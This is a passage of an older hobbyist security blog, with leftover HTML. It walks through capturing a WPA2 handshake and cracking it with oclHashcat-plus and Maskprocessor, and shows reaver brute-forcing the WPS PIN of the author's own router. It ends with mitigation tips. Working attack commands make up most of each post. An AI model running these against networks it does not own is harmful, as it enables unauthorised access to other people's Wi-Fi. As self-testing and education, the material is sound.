If you were to expect that the first 4 characters were for instance '1234' then you can fix these characters<br />
in the mask as follows ;<br />
<br />
<span style="color: lime;">mp64.exe -i --increment-min=8 1234?d?d?d?d?d?d | ^</span><br />
<span style="color: lime;">cudaHashcat-plus64.exe -m 2500 -n 80 fubar.hccap</span><br />
so Maskprocessor would go through 12340000 -- 1234999999<br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/mp_i_01.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="598" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/mp_i_01.jpg" width="640" /></a></div><br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
This however does not work the other way around, so if for instance knowing that the last 4 characters<br />
are 6789 and using syntax ;<br />
mp64.exe -i --increment-min=8 ?d?d?d?d?d??d6789 | oclHashcat-plus64.exe -m 2500 fubar.hccap<br />
will not work as the syntax is of course passing on the first 8 characters as defined from left to right which<br />
is cutting off the 2 last characters which we would want fixed.<br />
<br />
<div>So in such a case as above we would have to use a so-called rule to have the numeric values 6789 appended to each created passphrase.</div><div><br />
To create such a rule we would need to create a file called append.rule for instance with the following entry;<br />
$6$7$8$9<br />
This rule would specify that each line fed into oclHashcat will have the numbers 6789 appended to it.<br />
<br />
<span style="color: yellow;">echo $6$7$8$9 > append.rule</span><br />
In this case you could also specify the --increment-min=4 so that hashcat would always check a minimum<br />
of 8 characters (as 4 characters appended to each generated line) or just leave out the --increment-min<br />
and let hashcat reject words with less than 8 characters.<br />
<br />
</div><div><span style="color: lime;">mp64.exe -i ?d?d?d?d?d?d?d?d?d?d?d?d | cudaHashcat-plus64.exe -r append.rule -m 2500 fubar.hccap </span></div><div><br />
</div><div><div class="separator" style="clear: both; text-align: center;"><a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/mp_i_04.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="598" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/mp_i_04.jpg" width="640" /></a></div><br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
</div><div><b>RULES</b></div><div><a href="http://hashcat.net/wiki/rule_based_attack">http://hashcat.net/wiki/rule_based_attack</a></div><div><a href="http://kaoticcreations.blogspot.com/2011/09/explanation-of-hashcat-rules.html" target="_blank">http://kaoticcreations.blogspot.com/2011/09/explanation-of-hashcat-rules.html</a> </div><div><br />
Will have to be my next area of focus..<br />
<br />
</div><div><br />
<b>BENEFITS OF MASKPROCESSOR OVER CRUNCH ;</b><br />
<b>==========================================</b><br />
Not much to be honest if you are on a linux system, but what it<br />
does allow is the specification of custom charsets for use in masks.<br />
<br />
I have to say though, the more I play with it, the more I like it ;<br />
Having an option which is nearly as versatile as crunch, yet able to<br />
run easily on Windows, makes this a great tool for me.<br />
In combination with Hashcat running on windows this really is a<br />
must have in your toolkit.<br />
<br />
I am sure there are other wordlist generators for windows,<br />
but this to me definately seems like the one to have and a truly<br />
inpressive tool.<br />
<br />
Speedwise, Maskprocessor is (quite a bit) faster than Crunch, crunch is<br />
of course fast as it is, and possibly better documented (by me ;) ) at time of writing,<br />
but that does not take away from the fact that Maskprocessor is an awesome bit of kit.<br />
<br />
<br />
There are other uses for Maskprocessor such as creating rules for use with<br />
oclHashcat which I still need to dig into.<br />
(promises.. promises.. ;) )<br />
<br />
<br />
<u><b>Linkage ;</b></u><br />
<a href="http://hashcat.net/wiki/maskprocessor">http://hashcat.net/wiki/maskprocessor</a><br />
<a href="http://hashcat.net/wiki/mask_attack">http://hashcat.net/wiki/mask_attack</a> <br />
<a href="http://www.irongeek.com/i.php?page=videos/hack3rcon2/martin-bos-your-password-policy-sucks">http://www.irongeek.com/i.php?page=videos/hack3rcon2/martin-bos-your-password-policy-sucks</a> <br />
<br />
<br />
<br />
</div>Unknownnoreply@blogger.com16tag:blogger.com,1999:blog-8356530514965708840.post-8246871545634596732012-02-06T17:42:00.018+01:002012-02-11T10:07:08.061+01:00WPA Cracking with oclHashcat-plusoclHashcat-plus is a CPU / GPU password cracker with a huge number of options able to<br />
handle a myriad of hash types.<br />
<br />
I will go through steps I took to test the cracking of a WPA2 .cap file from my test setup.<br />
<br />
I will be using BackTrack5 R1 to capture the .cap file with 4-way handshake and to create the required<br />
.hccap file but will carry out the actual cracking of the .hccap file on a Win7 PC.<br />
This as I am still worried that my knack of fubarring things up could prove life-threatening if I screw up a BTR1 HDD install on my main machine ;) so I'll stick with using a VM image for the time being..<br />
lols..<br />
<br />
<br />
<b>PREPARATION</b><br />
===============<br />
First things first, I want to use aircrack to create the .hccap file from a standard .cap file using the new<br />
-J option in aircrack as oclHashcat does not work with the standard .cap files.<br />
The aircrack version included on the stock install of BT5R1 does not yet have this option -J included, so we need to get the latest and greatest from the aircrack site and do the necessary to install.<br />
<br />
Grab the latest build of aircrack here (last one in the list at time of writing 06-02-2012 was r2061);<br />
<a href="http://nightly.aircrack-ng.org/aircrack-ng/trunk/" target="_blank">http://nightly.aircrack-ng.org/aircrack-ng/trunk/</a><br />
extract and cd to directory;<br />
<span style="color: lime;">tar -xzf aircrack-ng-trunk-2012-02-05-r2061.tar.gz</span><br />
<span style="color: lime;">cd aircrack-ng-trunk-2012-02-05-r2061</span><br />
<br />
To be able to correctly install the latest aircrack some additional installs required before trying to install aircrack;<br />
(reference; <a href="http://hashcat.net/forum/thread-816.html" target="_blank">http://hashcat.net/forum/thread-816.html</a>)<br />
<span style="color: lime;">apt-get install libssl-dev</span><br />
<i>(I had previously installed this hence the mention already the newest version)</i><br />
Then from within the aircrack directory install with ;<br />
<span style="color: lime;">make</span><br />
<span style="color: lime;">make install</span><br />
<br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/ocl01.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="369" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/ocl01.jpg" width="640" /></a></div><br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
To update aircrack manually with previously downloaded files, there is a good detailed blogpost<br />
brought to my attention by a reader here <a href="http://www.kknd.com.br/security/01/" target="_blank">http://www.kknd.com.br/security/01/</a> on how to do that.<br />
<br />
Using either of the above methods, you should be ready to rock and roll with the latest aircrack-ng.<br />
<br />
<div style="color: red;"><u>Edit 10-02-2012</u></div>Backtrack repositories have been updated, the aircrack now included is<br />
v1.1 r2076, so;<br />
<div style="color: lime;">apt-get update </div><span style="color: lime;">apt-get upgrade</span><br />
will also get you a current version of aircrack which includes the -J switch.<br />
<br />
<br />
<b>CAPTURING THE WPA HANDSHAKE</b><br />
===============<br />
To start the process of capturing the handshake first place the wireless interface in monitor mode using airmon-ng;<br />
<br />
<span style="color: lime;">airmon-ng</span><br />
<span style="color: lime;">airmon-ng start wlan0</span><br />
<br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/ocl02.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="368" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/ocl02.jpg" width="640" /></a></div><br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
and then fire up airodump with options to focus only on your target AP, in my case ;<br />
<br />
<span style="color: lime;">airodump-ng mon0 -c 11 -t wpa -d 98:FC:11:8E:0E:9C -w capture</span><br />
<br />
When the handshake is captured, either by patiently waiting for a client to connect, or by forcing a<br />
connected client to disconnect/reconnect with for instance aireplay-ng, this will be noted at the top right hand side of the airodump window.<br />
We can then stop airodump and verify that the handshake is captured with aircrack ;<br />
<br />
<span style="color: lime;">aircrack-ng capture-01.cap</span><br />
<br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/ocl03.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="368" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/ocl03.jpg" width="640" /></a></div><br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
Now we have our .cap file with 4-way handshake, we need to convert it to .hccap format so that we<br />
can use oclHashcat on it.<br />
To do this we use the -J option in aircrack ;<br />
(<i>again, this option only available in the later aircrack builds, not in the stock install on BT5R1</i>)<br />
<br />
<span style="color: lime;">aircrack-ng capture-01.cap -J capture</span><br />
<br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/ocl04.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="492" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/ocl04.jpg" width="640" /></a></div><br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
Now we have our .hccap file, I will be switching to my Win7 PC for the actual oclHashcat cracking.<br />
(yeah yeah..I know.. a bit of a fail... ;) )<br />
<br />
<br />
<b>OCLHASHCAT-PLUS</b><br />
===============<br />
First of course to <a href="http://hashcat.net/oclhashcat-plus/" target="_blank">download</a> the latest oclHashcat-plus <i>(at time of writing 06-02-2012 v0.07)</i> if you haven't already done so and extract it to where you want, I extracted all files to ;<br />
c:\oclHashcat\<br />
<br />
Open up the command prompt ;<br />
Start --> Run --> cmd<br />
And move to the directory where you extracted the oclHashcat files to, in my case ;<br />
<br />
<span style="color: lime;">cd c:\oclHashcat</span><br />
<br />
I am running a 64bit Windows 7 system with an nVidia card (CUDA) so I need to run the cudaHashcat-plus64.exe file, with --help for further info ;<br />
<br />
<span style="color: lime;">cudaHashcat-plus64.exe --help</span><br />
<br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/ocl05.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/ocl05.jpg" /></a></div><br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
All the info may seem somewhat overwhelming, it certainly did to me, so herewith just a couple of<br />
examples on how it can be used.<br />
<br />
<i>I copied the capture.hccap previously created to the oclHashcat directory on the Windows system as</i><br />
<i>'capture_fubar.hccap'</i><br />
<br />
<br />
<b>DICTIONARY ATTACK</b><br />
===============<br />
I will be using the <a href="http://www.skullsecurity.org/wiki/index.php/Passwords" target="_blank">rockyou</a> dictionary as an example as it is a fairly large one, and copied the rockyou.txt file to the oclHashcat directory for easy access.<br />
<br />
To start the crack, we need to specify ;<br />
<span style="color: lime;">></span> The version of oclHashcat we need to use<br />
<i>in my case the 64bit version for cuda enabled cards, for ATI cards, you would use the ocl version.</i><br />
<span style="color: lime;">></span> -m [hash type #] <hash type="">(see number references for hash types at bottom of help section)</hash><br />
<i>in this case '2500' which is used for WPA/WPA2.</i><br />
<span style="color: lime;">></span> The path to the hash file / hccap file<br />
<i>in this case 'capture_fubar.hccap' in the same directory.</i><br />
<span style="color: lime;">></span> The path to the dictionary we are using for the attack<br />
<i>in this case 'rockyou.txt' in the same directory.</i><br />
<br />
<span style="color: lime;">cudaHashcat-plus64.exe -m 2500 capture_fubar.hccap rockyou.txt</span><br />
<i>Press 's' to get an updated status report (I hit enter first to create as space between status reports)</i><br />
<br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/ocl06.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/ocl06.jpg" /></a></div><br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
oclHashcat went through over 11,5million passphrases in 2min15sec at around 54k passphrases a second..<br />
<br />
Increasing the load on the GPU with the -n option can increase performance and the number of passphrases checked per second ;<br />
<br />
<span style="color: lime;">cudaHashcat-plus64.exe -m 2500 -n 80 capture_fubar.hccap rockyou.txt</span> <br />
<br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/ocl07.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/ocl07.jpg" /></a></div><br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
So with the increased load on the GPU it went from around 54k passphrases/sec to around 64k passphrases/sec.<br />
<br />
<br />
<br />
<b>MASK (BRUTEFORCE) ATTACK</b><br />
===============<br />
<br />
<br />
From what I read oclHashcat-plus is not yet able to mask bruteforce in increments (so first testing 8 characters then 9, then 10 etc) so you need to test that manually.<br />
However not completely sure on the bruteforce options to be honest as I see in the <a href="http://hashcat.net/wiki/brute_force_attack" target="_blank">WIKI</a> there are specific<br />
bruteforce options mentioned, but I can't seem to get that working as of yet.<br />
Reading up ;)<br />
<br />
The masked bruteforce attack works by defining character sets to use (if custom character sets are required),<br />
and then uses the masks to define in which position in the passphrase the charsets should be used.<br />
<br />
There are various predefined charsets, among which ;<br />
<span style="color: yellow;">?l</span> -- lower case alpha<br />
<span style="color: yellow;">?u</span> -- upper case alpha<br />
<span style="color: yellow;">?d</span> -- numeric values<br />
<span style="color: yellow;">?s</span> -- special characters including space<br />
<br />
To start a mask / bruteforce attack, you need to specify ;<br />
<br />
<span style="color: lime;">></span> The version of oclHashcat you need to use<br />
<span style="color: lime;">></span> -m [hash type #] <hash type=""> (-m 2500 for WPA/WPA2)</hash><br />
<span style="color: lime;">></span> -a [attack mode #] <attack mode="">(-a 3 for bruteforce).</attack><br />
<span style="color: lime;">></span> The custom character sets (if any).<br />
<span style="color: lime;">></span> The path to the hash file / hccap file.<br />
<span style="color: lime;">></span> The mask to use.<br />
<br />
<br />
The mask used has to match the length of the password, so if testing for a 8 digit password<br />
you have to enter 8 mask entries.<br />
<br />
If for instance testing all uppercase values for an 8 character password ;<br />
<br />
<span style="color: lime;">cudaHashcat-plus64.exe -m 2500 -a 3 capture.hccap ?u?u?u?u?u?u?u?u</span><br />
<br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/ocl08.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="478" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/ocl08.jpg" width="640" /></a></div><br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
If testing for numeric values only for an 8 character password ;<br />
<br />
<span style="color: lime;">cudaHashcat-plus64.exe -m 2500 -a 3 capture.hccap ?d?d?d?d?d?d?d?d</span><br />
<br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/ocl09.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="478" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/ocl09.jpg" width="640" /></a></div><br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
If we know that for an 8 digit password the 1st 4 digits of the password are numeric values and the last 4 digits are upper case values, then you would specify that as follows ;<br />
<br />
<span style="color: lime;">cudaHashcat-plus64.exe -m 2500 -a 3 capture.hccap ?d?d?d?d?u?u?u?u</span><br />
<br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/ocl010.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="478" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/ocl010.jpg" width="640" /></a></div><br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<u>CUSTOM CHARSETS</u><br />
<br />
You can define upto 4 custom charsets to be used, this is done by using the switches ;<br />
-1, -2, -3, -4<br />
<br />
So thinking of our above dictionary crack, for the sake of argument, lets say we know the passphrase<br />
used is a 4 digit number only containing the numbers 1 2 3 4 followed by 6 upper case values only containing the letters Y T R E W Q.<br />
<br />
We could create a custom charset containing the numbers 1234 and specify these to be used for the<br />
first 4 digits of the passphrase.<br />
and also create a second custom charset containing YTREWQ and specify these to be used for the last 6 digits of the passphrase.<br />
In the mask you would then specify where to use the 1st custom charset and where to use the 2nd custom charset with <b>?1</b> for the 1st custom charset and <b>?2</b> for the 2nd custom charset as follows ;<br />
<i>Of course this is not a terribly realistic scenario .. but hey, you get the idea.. </i><br />
<br />
<span style="color: lime;">cudaHashcat-plus64.exe -m 2500 -a 3 -1 1234 -2 YTREWQ capture_fubar.hccap ?1?1?1?1?2?2?2?2?2?2</span><br />
<br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/ocl011.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="478" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/ocl011.jpg" width="640" /></a></div><br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
If you were to actually <i>know</i> that the first 4 digits of the passphrase are '1234' followed by 6 uppercase alpha values then you can define the 1st 4 values of '1234' directly in the mask ;<br />
<br />
<span style="color: lime;">cudaHashcat-plus64.exe -m 2500 -a 3 -n 80 capture_fubar.hccap 1234?u?u?u?u?u?u</span><br />
<br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/ocl012.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="640" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/ocl012.jpg" width="593" /></a></div><br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
Of course the above examples are for the purpose of explanation only and probably not realistic for real-world scenarios, but I hope it shows at least a small part of how oclHashcat-plus can work.<br />
<br />
<br />
oclHashcat-plus is truly an awesome bit of kit, the speeds are certainly astonishing to me since I was used<br />
to non-GPU speeds before ;) 30 minutes to get through an 8 digit numeric wordlist ?!! awesome..<br />
And thats just on my nVidia GTX590 which sux big time compared with the benchmarks I see on hashcat's site for the ATI cards..<br />
<br />
There are many, many other options I need to get my head around; rules, dictionary mangling, bruteforce, the list goes on and on .. !<br />
A lot more reading and testing required...<br />
<br />
A good hint is to to also checkout the GUI for oclHashcat, it gives you a quick visual view of the commands<br />
that you are using so that you can trouble shoot what you are doing wrong when trying just on the command line.<br />
<br />
<br />
<br />
If I messed up anywhere on the above, please comment on it, have just started out trying hashcat so learning as I go !<br />
<br />
<br />
<br />
<b>Linkage/Credits; </b><br />
<br />
<a href="http://hashcat.net/oclhashcat-plus/" target="_blank">http://hashcat.net/oclhashcat-plus/</a> <br />
<br />
<a href="http://danielweis.wordpress.com/2011/10/13/gpu-password-cracking-of-wpa-using-airodump-oclhachcat-gui-a-basic-how-to/" target="_blank">http://danielweis.wordpress.com/2011/10/13/gpu-password-cracking-of-wpa-using-airodump-oclhachcat-gui-a-basic-how-to/</a><br />
<br />
d3ad0ne's awesomeness ;<br />
<a href="http://ob-security.info/?p=31" target="_blank">http://ob-security.info/?p=31</a><br />
<a href="http://pauldotcom.com/2010/10/your-password-cracking-system.html" target="_blank">http://pauldotcom.com/2010/10/your-password-cracking-system.html</a><br />
<a href="http://ob-security.info/?p=274" target="_blank">http://ob-security.info/?p=274</a>Unknownnoreply@blogger.com62tag:blogger.com,1999:blog-8356530514965708840.post-30962473803803790182012-01-18T23:33:00.036+01:002013-06-17T18:01:06.494+02:00Cracking WPA using the WPS vulnerability with reaver v1.3<div dir="ltr" style="text-align: left;" trbidi="on">
REAVER > WPS<br />
<br />
<span style="color: red;">WPS functionality leaves some routers at risk, even when WPS is 'not configured / disabled'..</span><br />
=====================================================================<br />
<br />
I am sure everyone has already seen by now, the WPS function, which is present on nearly<br />
all current routers, has been proven to be vulnerable (<a href="https://docs.google.com/spreadsheet/ccc?key=0Ags-JmeLMFP2dFp2dkhJZGIxTTFkdFpEUDNSSHZEN3c#gid=0">on some routers</a>) to a 2 stage bruteforce<br />
attack on the router's 8 digit pin.<br />
An extract from the readme from the author's google code page<br />
<a href="http://code.google.com/p/reaver-wps/wiki/README">http://code.google.com/p/reaver-wps/wiki/README</a> ;<br />
<br />
<i>Reaver performs a brute force attack against the AP, attempting every possible combination in order to guess the AP's 8 digit pin number. Since the pin numbers are all numeric, there are 10^8 (100,000,000) possible values for any given pin </i><br />
<i>The key space is reduced even further due to the fact that the WPS authentication protocol cuts the pin in half and validates each half individually. That means that there are 10^4 (10,000) possible values for the first half of the pin and 10^3 (1,000) possible values for the second half of the pin, with the last digit of the pin being a checksum.</i><br />
<br />
Now as soon as I had heard about this tool, I immediately checked to make sure that WPS was not configured on my router.<br />
As I always configure it manually, I was pretty sure WPS was disabled, and as I thought, WPS was not configured.<br />
<br />
<br />
Router information ; Cisco Linksys E1000 v2.0, Firmware v. 2.0.01<br />
I checked the router settings, made sure WPS was not configured then rebooted router ;<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/wps01.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="357" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/wps01.jpg" width="640" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
Little did I know that even though I had chosen to not to use WPS, WPS was <b><i><span style="color: red;">not </span></i></b>in fact disabled and the router was still vulnerable, which I found out after seeing it was mentioned to be the case on the <a href="http://www.backtrack-linux.org/forums/showthread.php?t=47038">BackTrack forums</a> and checking my own setup lateron ...<br />
<b><span style="color: red;">WTF..</span></b><br />
In retrospect, the term "<b><i>Configuration view</i></b>" does not say whether it is, or is not configured/enabled....<br />
Well played <strike>lawyers</strike> Linksys...<br />
<br />
I could not find any other possibility to alter the WPS settings on the router or any way to disable the PIN.<br />
<i>(There is actually a firmware upgrade for the router; v2.1.02, issued on 25-05-2011, so although the update may prevent</i><i> the WPS vulnerability or give more options to REALLY disable WPS, I haven't checked its possibilities as yet).</i><br />
<br />
<br />
Fired up BackTrack and specified airodump to focus only on my AP and to capture packets.<br />
<span style="color: lime;">airmon-ng start wlan0</span><br />
<span style="color: lime;">airodump-ng mon0 -c 11 -t wpa -d 98:FC:11:8E:0E:9C -a -w wps_test</span><br />
<br />
After just a few packets captured stopped capture and checked in Wireshark to see if any info on WPS..<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/wps02.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="381" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/wps02.jpg" width="640" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
lolwut ?!<br />
<br />
<br />
Downloaded and installed reaver (as of this date 18-01-2012 reaver v1.3) <br />
<a href="http://code.google.com/p/reaver-wps/">http://code.google.com/p/reaver-wps/</a><br />
<br />
<div style="color: lime;">
tar -xzf reaver-1.3 </div>
<div style="color: lime;">
cd reaver-1.3</div>
<div style="color: lime;">
cd src/</div>
<div style="color: lime;">
./configure</div>
<span style="color: lime;">make && make install</span><br />
<br />
and used reaver's included 'walsh' to check my AP (<b>walsh</b> was later renamed to <b>wash</b>) ;<br />
<br />
<br />
<span style="color: lime;">walsh</span><br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/wps03.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="357" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/wps03.jpg" width="640" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
Testing Walsh ;<br />
<span style="color: lime;">walsh -i mon0 -c 11 -C -s</span><br />
(just a simple <span style="color: lime;">walsh -i mon0</span> worked fine for me as well by the way, just limiting results with the above)<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/wps04.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="204" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/wps04.jpg" width="640" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
Damn..<br />
<br />
<br />
OK, so decided to see whether it actually was still vulnerable and so started reaver and let it do its thing.<br />
<br />
I got many warnings that 10 attempts failed in a row, receive timeout issues etc, so I basically did a few<br />
hours 3 days in a row, reaver saves the previous session in any case, so you can do it as and<br />
when you please..<br />
Tested on a Samsung N110, Atheros chipset, ath5k drivers for the wireless.<br />
<br />
<br />
<span style="color: lime;">reaver -i mon0 -f -c 11 -b 98:FC:11:8E:0E:9C -vv -x 60 </span><br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/wps06.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="356" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/wps06.jpg" width="640" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
Anyway, the final outcome.. BAH !<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/wps05.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="356" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/wps05.jpg" width="640" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
damn.. hacked.. !<br />
And here I was thinking I was nice and cosy in my "secure WPA2" world..<br />
The time used as mentioned above is not completely accurate as I had split the crack over 3 days with<br />
a few hours at a time, would imagine that in total it took between 10 - 12 hours in my case, possibly a couple of hours more.<br />
<br />
I had better results (less errors) when using a wireless adapter with REALTEK RTL8187L chipset with<br />
the rtl8187 driver.<br />
<br />
<br />
<br />
So, what to do ?<br />
Well, in my case, I bought a different/better router the day after I figured out that my router was still vulnerable.. screw it.. otherwise I was going to stay feeling uncertain ;)<br />
<br />
Other cheaper options ;<br />
<span style="color: red;"><b>></b></span> Check for firmware updates, possibly a revised firmware is available to counter the vulnerability.<br />
<span style="color: red;"><b>></b></span> Use 3rd party firmware (if supported) such as the likes of Open WRT or DD-WRT.<br />
(DD-WRT for instance does not support WPS and is therefore not vulnerable to the reaver attack)<br />
<br />
<span style="color: red;"><i>Edit 22-01-2012</i></span><br />
--------<br />
My previous remarks on MAC spoofing being an issue were incorrect.<br />
RTFM TAPE .. :|<br />
<a href="http://code.google.com/p/reaver-wps/wiki/FAQ">http://code.google.com/p/reaver-wps/wiki/FAQ</a><br />
